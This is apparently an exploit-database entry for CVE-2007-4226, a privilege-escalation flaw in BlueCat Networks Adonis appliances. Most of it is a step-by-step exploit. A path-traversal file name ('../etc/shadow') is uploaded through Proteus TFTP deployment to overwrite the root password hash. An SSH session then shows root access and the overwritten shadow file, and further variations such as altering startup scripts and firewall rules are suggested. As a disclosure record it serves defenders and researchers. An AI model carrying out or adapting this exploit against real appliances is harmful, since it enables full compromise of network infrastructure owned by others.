source: http://www.securityfocus.com/bid/25214/info BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability. This issue occurs when Proteus appliances are used to upload files to an affected Adonis appliance for TFTP download. An attacker with administrative privileges can exploit this issue to write arbitrary data with superuser privileges. A successful attack will result in the complete compromise of an affected appliance. Adonis 220.127.116.11 is vulnerable; other versions may also be affected. 0) Create a new TFTP Group in a Proteus configuration. 1) Add a TFTP deployment role specifying an Adonis appliance to the group. 2) At the top-level folder in the new TFTP group, add a file named "../etc/shadow" (without the quotes) and load a file containing the following line: root:Im0Zgl8tnEq9Y:13637:0:99999:7::: NOTE: The sshd configuration uses the default setting 'PermitEmptyPasswords no', so we specify a password of bluecat. 3) Deploy the configuration to the Adonis appliance. 4) You can now login to the Adonis appliance as root with password bluecat. $ ssh firstname.lastname@example.org email@example.com's password: # cat /etc/shadow root:Im0Zgl8tnEq9Y:13637:0:99999:7::: NOTE: This example assumes SSH is enabled, iptables permits port tcp/22, etc. Many attack variations are possible, such as changing system startup scripts to modify the iptables configuration on the appliance.
Related ExploitsTrying to match CVEs (1): CVE-2007-4226
Trying to match OSVDBs (1): 39397
Other Possible E-DB Search Terms: BlueCat Networks Adonis 18.104.22.168, BlueCat Networks Adonis
|2007-08-16||BlueCat Networks Adonis 22.214.171.124 - CLI Privilege Escalation||forloop|